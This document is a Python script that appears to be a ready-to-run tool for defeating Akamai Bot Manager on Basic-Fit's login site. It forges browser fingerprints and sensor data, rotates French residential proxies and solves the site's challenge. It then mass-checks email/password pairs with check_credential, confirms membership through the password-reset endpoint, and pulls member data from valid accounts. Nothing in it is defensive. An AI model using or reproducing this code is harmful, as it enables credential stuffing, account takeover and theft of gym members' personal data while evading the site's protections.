"""
Pure API Akamai BM v2 Solver for Basic-Fit — NO Playwright.
Sensor data generated by jsdom + fpgen fingerprints.
Zero browser overhead: ~5MB per session vs ~150MB with Playwright.

HTTP backend: curl_cffi (default) or lkrequest (EZ-XLabs, Chrome 131-150 TLS).
Set HTTP_CLIENT=lkrequest to use lkrequest.

Requirements:
  pip install curl_cffi fpgen
  fpgen fetch  (one-time model download)
  npm install jsdom canvas  (canvas optional but recommended)
  Node.js 18+
  Optional: pip install lkrequest  (for lkrequest backend)
"""
import json
import os
import random
import subprocess
import sys
import tempfile
import threading
import time

import fpgen

HTTP_CLIENT = os.environ.get("HTTP_CLIENT", "curl_cffi").lower()

BASE_URL = "https://login.basic-fit.com"
PRE_CHECK_URL = "https://webshop.basic-fit.com/fr/fr/profile/passwordresetform"
SSO_URL = "https://my.basic-fit.com/sso"
MEMBER_URL = "https://my.basic-fit.com/member/get-member"
CLIENT_ID = "5T2sVjv1ViH1FExCeRsXuT4EeLw91au1D2kpQS_4T3o"
LOGIN_URL = (
    f"{BASE_URL}/"
    "?client_id=5T2sVjv1ViH1FExCeRsXuT4EeLw91au1D2kpQS_4T3o"
    "&redirect_uri=https%3A%2F%2Fmy.basic-fit.com%2Fsso"
    "&response_type=code&state=cmV0dXJsOi8"
)
SENSOR_PATH = "/9Z8_LJx8U/FfIn1xEbA/t2taphkz4zk6Xk/EA1mYRtQBw/AjZ6O31J/O30B"
SENSOR_URL = f"{BASE_URL}{SENSOR_PATH}"
PROXY_USER = os.environ.get("PROXY_USER", "")
PROXY_PASS = os.environ.get("PROXY_PASS", "")
PROXY_HOST = os.environ.get("PROXY_HOST", "eu.nettify.xyz")
PROXY_PORT = os.environ.get("PROXY_PORT", "8080")
PROXY_TEMPLATE = (
    f"http://{PROXY_USER}-country-FR-session-{{session}}-time-1"
    f":{PROXY_PASS}@{PROXY_HOST}:{PROXY_PORT}"
)
RESI_USER = os.environ.get("RESI_USER", "")
RESI_PASS = os.environ.get("RESI_PASS", "")
RESI_HOST = os.environ.get("RESI_HOST", "eu.nettify.xyz")
RESI_PORT = os.environ.get("RESI_PORT", "8080")
FR_ASNS = [
    12322, 12727, 12876, 15557, 16276, 199140, 204645, 21502,
    29447, 3215, 41114, 41272, 42487, 51207, 52075, 5410, 8362,
]
MAX_ATTEMPTS = 3
REUSE_LIMIT = 3
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
JSDOM_GEN = os.path.join(SCRIPT_DIR, "jsdom_sensor_gen.js")
SOLVER_TYPE = "jsdom+fpgen"

_script_cache_lock = threading.Lock()
_script_cache = {"content": None, "time": 0, "ttl": 300}


# ---------------------------------------------------------------------------
# HTTP session abstraction — supports curl_cffi and lkrequest backends
# ---------------------------------------------------------------------------

class CurlSession:
    def __init__(self, proxy_url):
        from curl_cffi import requests as cffi_requests
        self._sess = cffi_requests.Session(
            impersonate="chrome131", proxies={"https": proxy_url, "http": proxy_url}
        )

    def get(self, url, headers=None):
        return self._sess.get(url, headers=headers or {})

    def post(self, url, headers=None, data=None, json_data=None):
        if json_data is not None:
            return self._sess.post(url, json=json_data, headers=headers or {})
        return self._sess.post(url, data=data, headers=headers or {})

    def get_cookie(self, name):
        return self._sess.cookies.get(name, "")

    def cookies_dict(self):
        return dict(self._sess.cookies)


class _LkResponse:
    def __init__(self, raw):
        self.status_code = raw.status_code
        self.text = raw.text() if callable(raw.text) else raw.text
        self.content = raw.content

    def json(self):
        return json.loads(self.text)


class LkSession:
    _PRESETS = {
        131: "chrome_131", 144: "chrome_144", 145: "chrome_145",
        146: "chrome_146", 147: "chrome_147", 148: "chrome_148",
        149: "chrome_149", 150: "chrome_150",
    }

    def __init__(self, proxy_url, chrome_ver=150):
        import lkrequest
        preset_ver = self._pick_preset(chrome_ver)
        factory = getattr(lkrequest.BlockingClient, f"chrome_{preset_ver}")
        self._client = factory()
        self._sess = self._client.session()
        self._proxy = proxy_url
        self._base_url = BASE_URL

    @classmethod
    def _pick_preset(cls, ver):
        available = sorted(cls._PRESETS.keys())
        for v in available:
            if v >= ver:
                return v
        return available[-1]

    def get(self, url, headers=None):
        return _LkResponse(self._sess.get(url, headers=headers or {}, proxy=self._proxy))

    def post(self, url, headers=None, data=None, json_data=None):
        if json_data is not None:
            return _LkResponse(self._sess.post(url, json=json_data, headers=headers or {}, proxy=self._proxy))
        return _LkResponse(self._sess.post(url, body=data, headers=headers or {}, proxy=self._proxy))

    def get_cookie(self, name):
        cookies = self._sess.get_cookies(self._base_url + "/")
        for n, v in cookies:
            if n == name:
                return v
        return ""

    def cookies_dict(self):
        cookies = self._sess.get_cookies(self._base_url + "/")
        return {n: v for n, v in cookies}


def _create_session(proxy_url, chrome_ver=131):
    if HTTP_CLIENT == "lkrequest":
        return LkSession(proxy_url, chrome_ver)
    return CurlSession(proxy_url)


# ---------------------------------------------------------------------------
# Core solver logic
# ---------------------------------------------------------------------------

def _log(msg):
    print(f"[{time.strftime('%H:%M:%S')}] {msg}")


def _make_proxy(asn=None):
    chars = "abcdefghijklmnopqrstuvwxyz0123456789"
    sid = "".join(random.choice(chars) for _ in range(6))
    if RESI_USER and (asn or os.environ.get("USE_RESI")):
        asn = asn or random.choice(FR_ASNS)
        url = (
            f"http://{RESI_USER}-country-FR-asn-{asn}-session-{sid}-time-1"
            f":{RESI_PASS}@{RESI_HOST}:{RESI_PORT}"
        )
        return url, f"{sid}/asn{asn}"
    url = PROXY_TEMPLATE.format(session=sid)
    return url, sid


def _generate_fingerprint():
    fp = fpgen.generate(browser="Chrome", os="Windows")
    fp["navigator"]["language"] = "fr-FR"
    fp["navigator"]["languages"] = ["fr-FR", "fr"]
    return fp


def _generate_sensors(cookies_dict, script_path, fp_path):
    cookies_json = json.dumps(cookies_dict)
    result = subprocess.run(
        ["node", JSDOM_GEN, cookies_json, script_path, fp_path],
        capture_output=True, text=True, timeout=20,
        cwd=SCRIPT_DIR,
    )
    if result.stderr:
        _log(f"  jsdom: {result.stderr.strip()[:200]}")
    if result.returncode != 0:
        return []
    try:
        data = json.loads(result.stdout.strip())
        return data.get("posts", [])
    except json.JSONDecodeError:
        _log(f"  jsdom parse error: {result.stdout[:200]}")
        return []


def solve(email: str, password: str, asn=None) -> dict:
    result = {"success": False, "error": "no attempts"}
    for attempt in range(1, MAX_ATTEMPTS + 1):
        proxy_url, proxy_sid = _make_proxy(asn=asn)
        _log(f"Attempt {attempt}/{MAX_ATTEMPTS} (proxy {proxy_sid})")
        try:
            result = _attempt(email, password, proxy_url)
            if result["success"]:
                return result
            if result.get("status") == 401:
                _log("Invalid credentials -- not retrying")
                return result
        except Exception as e:
            _log(f"Error: {e}")
            import traceback; traceback.print_exc()
            result = {"success": False, "error": str(e)}
        if attempt < MAX_ATTEMPTS:
            wait = random.uniform(3, 6)
            _log(f"Waiting {wait:.1f}s...")
            time.sleep(wait)
    return result


def _attempt(email, password, proxy_url):
    fp = _generate_fingerprint()
    ua = fp["navigator"]["userAgent"]
    chrome_ver = fp["client"]["browser"]["version"]
    chrome_major = int(chrome_ver.split(".")[0])
    sec_ch_ua = fp["headers"].get("sec-ch-ua", [""])[0]
    _log(f"  Fingerprint: Chrome/{chrome_ver}, GPU={fp['gpu']['renderer'][:40]}")
    _log(f"  HTTP client: {HTTP_CLIENT}" + (f" (chrome_{LkSession._pick_preset(chrome_major)} TLS)" if HTTP_CLIENT == "lkrequest" else " (chrome131 TLS)"))

    fp_file = tempfile.NamedTemporaryFile(
        mode="w", suffix=".json", delete=False, dir=SCRIPT_DIR
    )
    json.dump(fp, fp_file, default=str)
    fp_file.close()
    fp_path = fp_file.name

    try:
        return _run_attempt(email, password, proxy_url, ua, sec_ch_ua, fp_path, chrome_major)
    finally:
        try:
            os.unlink(fp_path)
        except OSError:
            pass


def _run_attempt(email, password, proxy_url, ua, sec_ch_ua, fp_path, chrome_major):
    sess = _create_session(proxy_url, chrome_major)

    base_headers = {
        "User-Agent": ua,
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
        "sec-ch-ua": sec_ch_ua,
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
    }

    _log("  GET login page...")
    r = sess.get(LOGIN_URL, headers=base_headers)
    if r.status_code != 200:
        return {"success": False, "error": f"page load {r.status_code}"}
    _log(f"  Page OK, trust={_get_trust(sess)}")

    _log("  GET sensor script...")
    r_js = sess.get(SENSOR_URL, headers={
        **base_headers,
        "Accept": "*/*",
        "Referer": LOGIN_URL,
        "sec-fetch-dest": "script",
        "sec-fetch-mode": "no-cors",
        "sec-fetch-site": "same-origin",
    })
    if r_js.status_code != 200:
        return {"success": False, "error": f"sensor script {r_js.status_code}"}

    script_file = tempfile.NamedTemporaryFile(
        mode="w", suffix=".js", delete=False, dir=SCRIPT_DIR, encoding="utf-8"
    )
    script_file.write(r_js.text)
    script_file.close()
    script_path = script_file.name
    _log(f"  Script: {len(r_js.text)} bytes")

    try:
        return _run_sensor_flow(
            sess, email, password, ua, sec_ch_ua, fp_path, base_headers, script_path,
        )
    finally:
        _cleanup_temp(script_path)


def _run_sensor_flow(sess, email, password, ua, sec_ch_ua, fp_path, base_headers, script_path):
    sensor_headers = {
        "Accept": "*/*",
        "Content-Type": "text/plain;charset=UTF-8",
        "Origin": BASE_URL,
        "Referer": LOGIN_URL,
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        **base_headers,
    }

    cookies_dict = sess.cookies_dict()
    _log("  Generating sensors (jsdom+fpgen)...")
    t0 = time.time()
    sensor_bodies = _generate_sensors(cookies_dict, script_path, fp_path)
    dt = time.time() - t0
    if not sensor_bodies:
        _log("  Sensor generation failed")
        return {"success": False, "error": "sensor generation failed"}
    _log(f"  Generated {len(sensor_bodies)} sensors ({dt:.1f}s)")

    time.sleep(random.uniform(0.2, 1.0))

    for i, body in enumerate(sensor_bodies):
        r_s = sess.post(SENSOR_URL, data=body.encode("utf-8"), headers=sensor_headers)
        trust = _get_trust(sess)
        _log(f"  POST #{i+1}/{len(sensor_bodies)}: {r_s.status_code}, trust={trust}")
        if trust == "0":
            _log("  Trust achieved!")
            break
        time.sleep(random.uniform(0.1, 0.4))

    trust = _get_trust(sess)
    _log(f"  Final trust={trust}")

    time.sleep(random.uniform(0.2, 0.8))

    csrf = sess.get_cookie("_csrf")
    login_headers = _login_headers(ua, csrf, sec_ch_ua)

    _log("  Login POST...")
    r_login = sess.post(
        f"{BASE_URL}/login",
        json_data={"email": email, "password": password, "keepLoggedIn": False},
        headers=login_headers,
    )
    _log(f"  Status: {r_login.status_code}, trust={_get_trust(sess)}")

    if r_login.status_code == 200:
        return _success_result(r_login, sess)
    if r_login.status_code == 401:
        _log("  401 - Akamai bypassed (creds rejected)")
        return {"success": False, "status": 401, "body": r_login.text[:500]}
    if r_login.status_code != 428:
        return {"success": False, "status": r_login.status_code,
                "body": r_login.text[:500], "error": f"unexpected {r_login.status_code}"}

    # 428 challenge
    challenge = r_login.json()
    chlge_url = challenge.get("chlge_content_url", "")
    verify_url = challenge.get("verify_url", "")
    _log(f"  428 challenge, sec_cpt={_get_sec_cpt(sess)}")

    sess.get(
        f"{BASE_URL}{chlge_url}",
        headers={**base_headers, "Referer": LOGIN_URL},
    )

    time.sleep(random.uniform(0.2, 0.8))

    for i in range(3):
        cookies_dict = sess.cookies_dict()
        chlge_bodies = _generate_sensors(cookies_dict, script_path, fp_path)
        if chlge_bodies:
            for j, body in enumerate(chlge_bodies):
                r_c = sess.post(SENSOR_URL, data=body.encode("utf-8"), headers=sensor_headers)
                sec = _get_sec_cpt(sess)
                _log(f"  Challenge batch #{i+1} post #{j+1}: {r_c.status_code}, sec_cpt={sec}")
                if sec == "2":
                    break
                time.sleep(random.uniform(0.1, 0.4))
            if _get_sec_cpt(sess) == "2":
                break
        time.sleep(1)

    if _get_sec_cpt(sess) != "2":
        _log(f"  sec_cpt didn't reach 2 (got {_get_sec_cpt(sess)})")
        return {"success": False, "error": "challenge sensor failed",
                "trust": _get_trust(sess), "sec_cpt": _get_sec_cpt(sess)}

    if verify_url:
        _log("  Verify POST...")
        r_v = sess.post(
            f"{BASE_URL}/{verify_url}",
            data=json.dumps({"sensor_data": ""}).encode("utf-8"),
            headers={
                "Accept": "*/*",
                "Content-Type": "text/plain;charset=UTF-8",
                "Origin": BASE_URL,
                "Referer": f"{BASE_URL}{chlge_url}",
                **base_headers,
            },
        )
        _log(f"  Verify: {r_v.status_code}, sec_cpt={_get_sec_cpt(sess)}")

    time.sleep(random.uniform(0.5, 1.5))

    csrf = sess.get_cookie("_csrf") or csrf
    login_headers = _login_headers(ua, csrf, sec_ch_ua)
    _log("  Retry login POST...")
    r2 = sess.post(
        f"{BASE_URL}/login",
        json_data={"email": email, "password": password, "keepLoggedIn": False},
        headers=login_headers,
    )
    _log(f"  Retry: {r2.status_code}, trust={_get_trust(sess)}, sec_cpt={_get_sec_cpt(sess)}")

    if r2.status_code == 200:
        return _success_result(r2, sess)
    if r2.status_code == 401:
        _log("  401 - Akamai bypassed after challenge!")
        return {"success": False, "status": 401, "body": r2.text[:500]}

    return {"success": False, "status": r2.status_code, "body": r2.text[:500],
            "error": "challenge solve failed"}


def _cleanup_temp(path):
    try:
        os.unlink(path)
    except OSError:
        pass


def _login_headers(ua, csrf, sec_ch_ua):
    h = {
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json",
        "Origin": BASE_URL,
        "Referer": LOGIN_URL,
        "User-Agent": ua,
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
        "sec-ch-ua": sec_ch_ua,
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        "client-id": "5T2sVjv1ViH1FExCeRsXuT4EeLw91au1D2kpQS_4T3o",
        "redirect-uri": "https://my.basic-fit.com/sso",
        "response-type": "code",
    }
    if csrf:
        h["x-csrf-token"] = csrf
    return h


def _get_trust(sess):
    abck = sess.get_cookie("_abck")
    return abck.split("~")[1] if "~" in abck else "?"


def _get_sec_cpt(sess):
    sc = sess.get_cookie("sec_cpt")
    return sc.split("~")[1] if sc and "~" in sc else "none"


def _success_result(r, sess):
    _log("  SUCCESS!")
    body = r.text
    result = {"success": True, "status": 200, "cookies": sess.cookies_dict()}
    try:
        data = json.loads(body)
        result["auth_code"] = data.get("code")
    except (json.JSONDecodeError, TypeError):
        pass
    result["body"] = body[:500]
    return result


_precheck_errors = {"last": "", "count": 0}
_precheck_errors_lock = threading.Lock()


def pre_check_email(email, proxy_url=None, retries=2):
    from curl_cffi import requests as cffi_requests
    proxies = {"https": proxy_url, "http": proxy_url} if proxy_url else None
    last_err = None
    for attempt in range(retries + 1):
        try:
            r = cffi_requests.post(
                PRE_CHECK_URL,
                data={"loginEmail": email},
                headers={
                    "Content-Type": "application/x-www-form-urlencoded",
                    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                                  "(KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
                    "Accept": "*/*",
                },
                proxies=proxies,
                impersonate="chrome131",
                timeout=15,
            )
            data = r.json()
            return data.get("isGymMember", False)
        except Exception as e:
            last_err = f"{type(e).__name__}: {e}"
            if attempt < retries:
                if proxy_url:
                    proxy_url, _ = _make_proxy()
                    proxies = {"https": proxy_url, "http": proxy_url}
                time.sleep(random.uniform(0.5, 2))
    with _precheck_errors_lock:
        if last_err != _precheck_errors["last"]:
            _precheck_errors["last"] = last_err
            _precheck_errors["count"] = 1
            _log(f"  Pre-check error: {last_err[:120]}")
        else:
            _precheck_errors["count"] += 1
    return None


def capture_member(ctx, auth_code):
    sess = ctx["sess"]
    ua = ctx["ua"]
    sec_ch_ua = ctx["sec_ch_ua"]
    sso_headers = {
        "User-Agent": ua,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
        "Upgrade-Insecure-Requests": "1",
        "sec-ch-ua": sec_ch_ua,
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "sec-fetch-dest": "document",
        "sec-fetch-mode": "navigate",
        "sec-fetch-site": "same-site",
        "sec-fetch-user": "?1",
        "Referer": "https://login.basic-fit.com/",
    }
    _log("  SSO redirect...")
    r_sso = sess.get(f"{SSO_URL}?code={auth_code}&state=cmV0dXJsOi8", headers=sso_headers)
    _log(f"  SSO: {r_sso.status_code}")

    api_headers = {
        "User-Agent": ua,
        "Accept": "application/json, text/plain, */*",
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
        "sec-ch-ua": sec_ch_ua,
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        "Referer": "https://my.basic-fit.com/",
    }
    _log("  GET member info...")
    r_member = sess.get(MEMBER_URL, headers=api_headers)
    _log(f"  Member: {r_member.status_code}")
    try:
        return r_member.json()
    except Exception:
        return {"error": "parse failed", "body": r_member.text[:500]}


def solve_session(asn=None):
    for attempt in range(1, MAX_ATTEMPTS + 1):
        proxy_url, proxy_sid = _make_proxy(asn=asn)
        _log(f"Attempt {attempt}/{MAX_ATTEMPTS} (proxy {proxy_sid})")
        try:
            ctx = _attempt_session(proxy_url)
            if ctx:
                return ctx
        except Exception as e:
            _log(f"Error: {e}")
            import traceback; traceback.print_exc()
        if attempt < MAX_ATTEMPTS:
            time.sleep(random.uniform(3, 6))
    return None


def _attempt_session(proxy_url):
    fp = _generate_fingerprint()
    ua = fp["navigator"]["userAgent"]
    chrome_ver = fp["client"]["browser"]["version"]
    chrome_major = int(chrome_ver.split(".")[0])
    sec_ch_ua = fp["headers"].get("sec-ch-ua", [""])[0]
    _log(f"  Fingerprint: Chrome/{chrome_ver}, GPU={fp['gpu']['renderer'][:40]}")

    fp_file = tempfile.NamedTemporaryFile(
        mode="w", suffix=".json", delete=False, dir=SCRIPT_DIR
    )
    json.dump(fp, fp_file, default=str)
    fp_file.close()
    fp_path = fp_file.name

    sess = _create_session(proxy_url, chrome_major)
    base_headers = {
        "User-Agent": ua,
        "Accept-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7",
        "sec-ch-ua": sec_ch_ua,
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
    }
    sensor_headers = {
        "Accept": "*/*",
        "Content-Type": "text/plain;charset=UTF-8",
        "Origin": BASE_URL,
        "Referer": LOGIN_URL,
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        **base_headers,
    }

    _log("  GET login page...")
    r = sess.get(LOGIN_URL, headers=base_headers)
    if r.status_code != 200:
        _cleanup_temp(fp_path)
        return None
    _log(f"  Page OK, trust={_get_trust(sess)}")

    _log("  GET sensor script...")
    r_js = sess.get(SENSOR_URL, headers={
        **base_headers,
        "Accept": "*/*", "Referer": LOGIN_URL,
        "sec-fetch-dest": "script", "sec-fetch-mode": "no-cors",
        "sec-fetch-site": "same-origin",
    })
    if r_js.status_code != 200:
        _cleanup_temp(fp_path)
        return None

    with _script_cache_lock:
        _script_cache["content"] = r_js.text
        _script_cache["time"] = time.time()

    script_file = tempfile.NamedTemporaryFile(
        mode="w", suffix=".js", delete=False, dir=SCRIPT_DIR, encoding="utf-8"
    )
    script_file.write(r_js.text)
    script_file.close()
    script_path = script_file.name
    _log(f"  Script: {len(r_js.text)} bytes")

    cookies_dict = sess.cookies_dict()
    _log("  Generating sensors (jsdom+fpgen)...")
    t0 = time.time()
    sensor_bodies = _generate_sensors(cookies_dict, script_path, fp_path)
    dt = time.time() - t0
    if not sensor_bodies:
        _cleanup_temp(fp_path); _cleanup_temp(script_path)
        return None
    _log(f"  Generated {len(sensor_bodies)} sensors ({dt:.1f}s)")

    time.sleep(random.uniform(0.2, 1.0))
    for i, body in enumerate(sensor_bodies):
        r_s = sess.post(SENSOR_URL, data=body.encode("utf-8"), headers=sensor_headers)
        trust = _get_trust(sess)
        _log(f"  POST #{i+1}/{len(sensor_bodies)}: {r_s.status_code}, trust={trust}")
        if trust == "0":
            break
        time.sleep(random.uniform(0.1, 0.4))

    time.sleep(random.uniform(0.2, 0.8))
    csrf = sess.get_cookie("_csrf")
    login_h = _login_headers(ua, csrf, sec_ch_ua)

    _log("  Trigger login POST...")
    r_login = sess.post(
        f"{BASE_URL}/login",
        json_data={"email": "solve@solve.com", "password": "solve123", "keepLoggedIn": False},
        headers=login_h,
    )
    _log(f"  Status: {r_login.status_code}, trust={_get_trust(sess)}")

    if r_login.status_code == 401:
        _log("  Session trusted (no challenge needed)")
        return {
            "sess": sess, "ua": ua, "sec_ch_ua": sec_ch_ua,
            "base_headers": base_headers, "sensor_headers": sensor_headers,
            "uses_left": REUSE_LIMIT,
            "_fp_path": fp_path, "_script_path": script_path,
        }

    if r_login.status_code != 428:
        _cleanup_temp(fp_path); _cleanup_temp(script_path)
        return None

    challenge = r_login.json()
    chlge_url = challenge.get("chlge_content_url", "")
    verify_url = challenge.get("verify_url", "")
    _log(f"  428 challenge, sec_cpt={_get_sec_cpt(sess)}")

    sess.get(f"{BASE_URL}{chlge_url}", headers={**base_headers, "Referer": LOGIN_URL})
    time.sleep(random.uniform(0.2, 0.8))

    for i in range(3):
        cookies_dict = sess.cookies_dict()
        chlge_bodies = _generate_sensors(cookies_dict, script_path, fp_path)
        if chlge_bodies:
            for j, body in enumerate(chlge_bodies):
                r_c = sess.post(SENSOR_URL, data=body.encode("utf-8"), headers=sensor_headers)
                sec = _get_sec_cpt(sess)
                _log(f"  Challenge #{i+1} post #{j+1}: {r_c.status_code}, sec_cpt={sec}")
                if sec == "2":
                    break
                time.sleep(random.uniform(0.1, 0.4))
            if _get_sec_cpt(sess) == "2":
                break
        time.sleep(0.5)

    if _get_sec_cpt(sess) != "2":
        _cleanup_temp(fp_path); _cleanup_temp(script_path)
        return None

    if verify_url:
        _log("  Verify POST...")
        r_v = sess.post(
            f"{BASE_URL}/{verify_url}",
            data=json.dumps({"sensor_data": ""}).encode("utf-8"),
            headers={
                "Accept": "*/*",
                "Content-Type": "text/plain;charset=UTF-8",
                "Origin": BASE_URL,
                "Referer": f"{BASE_URL}{chlge_url}",
                **base_headers,
            },
        )
        _log(f"  Verify: {r_v.status_code}, sec_cpt={_get_sec_cpt(sess)}")

    _log("  Session solved!")
    return {
        "sess": sess, "ua": ua, "sec_ch_ua": sec_ch_ua,
        "base_headers": base_headers, "sensor_headers": sensor_headers,
        "uses_left": REUSE_LIMIT,
        "_fp_path": fp_path, "_script_path": script_path,
    }


def check_credential(ctx, email, password, capture=False):
    sess = ctx["sess"]
    time.sleep(random.uniform(0.3, 0.8))
    csrf = sess.get_cookie("_csrf")
    login_h = _login_headers(ctx["ua"], csrf, ctx["sec_ch_ua"])

    r = sess.post(
        f"{BASE_URL}/login",
        json_data={"email": email, "password": password, "keepLoggedIn": False},
        headers=login_h,
    )
    status = r.status_code
    ctx["uses_left"] -= 1

    if status == 200:
        result = {"email": email, "password": password, "valid": True, "status": 200}
        if capture:
            try:
                auth_code = r.json().get("code")
                if auth_code:
                    result["member"] = capture_member(ctx, auth_code)
            except Exception as e:
                result["capture_error"] = str(e)
        ctx["uses_left"] = 0
        return result
    if status == 401:
        return {"email": email, "password": password, "valid": False, "status": 401}
    if status == 428:
        ctx["uses_left"] = 0
        return {"email": email, "password": password, "valid": None, "status": 428, "error": "cookie expired"}
    return {"email": email, "password": password, "valid": None, "status": status, "error": f"unexpected {status}"}


def cleanup_session(ctx):
    if ctx:
        _cleanup_temp(ctx.get("_fp_path", ""))
        _cleanup_temp(ctx.get("_script_path", ""))


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        em, pw = sys.argv[1], sys.argv[2]
    else:
        em = input("Email: ").strip()
        pw = input("Password: ").strip()

    result = solve(em, pw)
    print(f"\n{'='*60}")
    print(f"Result: {'SUCCESS' if result['success'] else 'FAILED'}")
    for k, v in result.items():
        if k == "cookies":
            print(f"  cookies: {list(v.keys())}")
        elif k != "success":
            print(f"  {k}: {str(v)[:200]}")
